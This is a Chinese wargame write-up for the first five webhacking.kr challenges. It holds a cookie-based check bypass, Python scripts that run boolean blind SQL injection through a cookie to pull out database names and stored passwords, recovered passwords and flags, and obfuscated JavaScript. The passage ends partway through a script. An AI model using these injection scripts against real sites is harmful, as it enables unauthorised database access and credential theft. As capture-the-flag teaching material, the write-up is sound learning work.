果真是webhacking,申请账号都这么有逼格^_^用burp抓包发现源码访问如下
还有什么decode me需要三次解码base64即可得到一个ip值即可,然后就可以开始我们的挑战啦!
第一关
上来得到代码
<?
if(!$_COOKIE[user_lv])
{
SetCookie("user_lv","1");
echo("<meta http-equiv=refresh content=0>");
}
?>
<html>
<head>
<title>Challenge 1</title>
</head>
<body bgcolor=black>
<center>
<br><br><br><br><br>
<font color=white>
---------------------<br>
<?
$password="????";
if(eregi("[^0-9,.]",$_COOKIE[user_lv])) $_COOKIE[user_lv]=1;
if($_COOKIE[user_lv]>=6) $_COOKIE[user_lv]=1;
if($_COOKIE[user_lv]>5) @solve();
echo("<br>level : $_COOKIE[user_lv]");
?>
<br>
<pre>
<a onclick=location.href='index.phps'>----- index.phps -----</a>
</body>
</html>
然后我们看一下eregi匹配的东西[^0-9,.]
匹配了除了数字、小数点和逗号的字符,如果匹配到了那么就将cookie值赋成1,否则沿用,而且我们注意到了存在小数点,要我们输入的东西大于5小于6,就是中间的小数。随便构造一下就好了
第二关
这一关不全是我自己想出来的…主要是确实想不到吧。首先扫描了一遍目录,发现存在/admin/后台,然后尝试了一下并不存在什么注入点(一开始一心以为是注入,以为只不过我的水平实在是太差了而已)但是经过提示是cookie注入…加上无意间发现了这个玩意
发现个别时候时间会出现error???而且我们的时间戳不变的话反映出的时间其实不会改变的。然后尝试盲注发现可以成功爆出所在数据库
#_*_ coding:utf-8 _*_
import re,urllib,requests
url = 'http://webhacking.kr/challenge/web/web-02/'
temp = 0
def search2(content,pos,l,r):
global temp
if l>r:
return
mid = (l+r)/2
inject='23333333 and 1=(select ascii(substr('+content+' from '+str(pos)+'))>='+str(mid)+')'
print inject
cookies = {
'time':inject,'PHPSESSID':'136de2147ed2139e37dceda9c0d90144','td_cookie':'18446744072591562357'}
html = requests.get(url,cookies=cookies).text.encode('utf-8')
if '<!--2070-01-01 09:00:01-->' in html:
temp=mid
search2(content,pos,mid+1,r)
else :
search2(content,pos,l,mid-1)
def get_database():
global url
global temp
db =''
for i in range(1,50):
temp = 0
search2('database()',i,1,130)
if temp==0:
break
db+=chr(temp)
print db
get_database()
但是仅仅限于此了,因为它过滤了table_name等关键词…然后就陷入了尴尬的情况,我们到底需要知道什么?猜测就是password列名和admin表名…成功了??
#_*_ coding:utf-8 _*_
import re,urllib,requests
url = 'http://webhacking.kr/challenge/web/web-02/'
temp = 0
def search2(content,pos,l,r):
global temp
if l>r:
return
mid = (l+r)/2
inject='23333333 and 1=(select ascii(substr('+content+' from '+str(pos)+'))>='+str(mid)+')'
print inject
cookies = {
'time':inject,'PHPSESSID':'136de2147ed2139e37dceda9c0d90144','td_cookie':'18446744072591562357'}
html = requests.get(url,cookies=cookies).text.encode('utf-8')
if '<!--2070-01-01 09:00:01-->' in html:
temp=mid
search2(content,pos,mid+1,r)
else :
search2(content,pos,l,mid-1)
def get_password():
global url
global temp
password =''
for i in range(1,50):
temp = 0
search2('(select password from admin)',i,1,130)
if temp==0:
break
password+=chr(temp)
print password
#get_database()
#webhacking 0x7765626861636b696e67
get_password()
到/admin/登陆试试然后看到
-관리자 패스워드가 유출되지 않게 조심하세요.
-처음 사용하시는 분은 메뉴얼을 참고하세요.(메뉴얼 패스워드 : @dM1n__nnanual)
但是我们的目标似乎在这里
嗯…但是这个提示有个鬼用…试了试都不是该密码,莫名其妙的又一个脑洞…
对,你没猜错,这个地方存在一个password列…我…直接爆就行了,加上这个代码
def get_password():
global url
global temp
password =''
for i in range(1,50):
temp = 0
search2('(select password from FreeB0aRd)',i,1,140)
if temp==0:
break
password+=chr(temp)
print password
容易得到密码是7598522ae
,进入以后发现存在一个压缩包的连接什么鬼???
zip文件还存在密码…额,这个估计就是admin里面提示的那个密码了吧,打开尝试果真如此,成功打开网页发现了答案…
HacKed_by_n0b0dY
脑洞真心艰难…劳资要报警了…喂?110在吗?
第三关
真是够了有没有…这玩意就是真的猜测题目啊!!!!还想爆破,不过感觉就是扯淡…然后观察格子,最后猜测,就是每一行或每一列对应的就是我们应该画上的黑格子的数量,比如一个3,我们就要画三个连续的黑格子,比如111,我们就要画三个间隔的黑格子
敢不敢别真出数学题啊…
然后我们可以进入到这个界面
看着正常多了…猜测是注入吧,因为回显并没有显示什么,神特么什么都搞不出来…后面提交的answer貌似存在注入吧,会回显
query error!
fuzz 一发(也不知道他要干嘛)得到没过滤的寥寥无几
发现or and select什么的都被过滤了,不像是注入了…扎心了老铁…实在不知道干嘛看了题解,我知道||
没过滤,但是这又是啥做法……
我真的要报警了啊,实在是脑洞太大了……要么简单到死要么脑洞难…
第四关
这是什么玩意儿???首先base64解密,得到一个什么sha1的东东?
拿去解密解密成功得到
a94a8fe5ccb19ba61c4c0873d391e987982fbbd3
神特么…还是sha1?继续解密得到答案…
test
第五关
发现了界面上显示有什么login和join按钮,然后看一下源码发现存在/mem/login.php,而join按钮直接返回一个alert,但是真的是想错了!!!真是太社会了…发现/mem/目录可见!!!就会发现在那个目录地下还有一个join.php。。。惊不惊喜?
得到一堆源码,然后稍微处理一下,主要代码如下
<script>
l = 'a';
ll = 'b';
lll = 'c';
llll = 'd';
lllll = 'e';
llllll = 'f';
lllllll = 'g';
llllllll = 'h';
lllllllll = 'i';
llllllllll = 'j';
lllllllllll = 'k';
llllllllllll = 'l';
lllllllllllll = 'm';
llllllllllllll = 'n';
lllllllllllllll = 'o';
llllllllllllllll = 'p';
lllllllllllllllll = 'q';
llllllllllllllllll = 'r';
lllllllllllllllllll = 's';
llllllllllllllllllll = 't';
lllllllllllllllllllll = 'u';
llllllllllllllllllllll = 'v';
lllllllllllllllllllllll = 'w';
llllllllllllllllllllllll = 'x';
lllllllllllllllllllllllll = 'y';
llllllllllllllllllllllllll = 'z';
I = '1';
II = '2';
III = '3';
IIII = '4';
IIIII = '5';
IIIIII = '6';
IIIIIII = '7';
IIIIIIII = '8';
IIIIIIIII = '9';
IIIIIIIIII = '0';
li = '.';
ii = '<';
iii = '>';
lIllIllIllIllIllIllIllIllIllIl = lllllllllllllll + llllllllllll + llll + llllllllllllllllllllllllll + lllllllllllllll + lllllllllllll + ll + lllllllll + lllll;
lIIIIIIIIIIIIIIIIIIl = llll + lllllllllllllll + lll + lllllllllllllllllllll + lllllllllllll + lllll + llllllllllllll + llllllllllllllllllll + li + lll + lllllllllllllll + lllllllllllllll + lllllllllll + lllllllll + lllll;
if (eval(lIIIIIIIIIIIIIIIIIIl).indexOf(lIllIllIllIllIllIllIllIllIllIl) == -1) {
alert("Goodbye");
}
if (eval(llll + lllllllllllllll + lll + lllllllllllllllllllll + lllllllllllll + lllll + llllllllllllll + llllllllllllllllllll + li + 'U' + 'R' + 'L').indexOf(lllllllllllll + lllllllllllllll + llll + lllll + '=' + I) == -1) {
alert('access_denied');
history.go(-1);
} else {
document.write('<font size=2 color=white>